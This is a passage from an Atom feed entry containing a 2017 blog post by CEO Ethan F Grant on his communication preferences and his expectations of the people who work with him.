<p>You can contact me 24 hours a day. I try to respond quickly, and I appreciate when you do too. I often work at night, including weekends. This is my choice. I do not expect you to work or respond to my messages during these hours. Unless a message is urgent, it can wait until you return to work.</p>

<p>Here's how I rank communication methods in order of preference: in person, phone call, text message, email. If your preferences differ, it is up to you to let me know.</p>

<p class="pause">My Expectations</p>

<p>Do amazing work. Let your intellectual curiosity and hunger drive you. Let me know if there is something preventing you from accomplishing this. When your task feels poorly defined, you should ask me for both context and clarification.</p>

<p>I never want to be the smartest person in the room. I'm ok with that and you should be too. The best solutions are often born from ideological diversity and healthy debate. You're expected to challenge assumptions and biases, not individuals.</p>

<p>Operate as a Directly Responsible Individual (you own your work). I believe failure is productive. If you feel you made a mistake, own up to it immediately so we can find a solution together, learn from it, and move forward.</p>

<p>Tell me when I screw up. I don't always recognize when I've screwed up. If I don't know what I did wrong, I'll very likely do it again.</p>

<p>When you need me to do something, ask me. I respond well to, "Ethan, I need X, can you help?" and poorly to, "Ethan, do X."</p>

<p class="quote">Published September 01, 2017</p>
				]]>
			</div>
		</content>
		<author>
			<name>Ethan F Grant, CEO</name>
			<uri>ethanfgrant.com</uri>
		</author>
	</entry>

</feed>
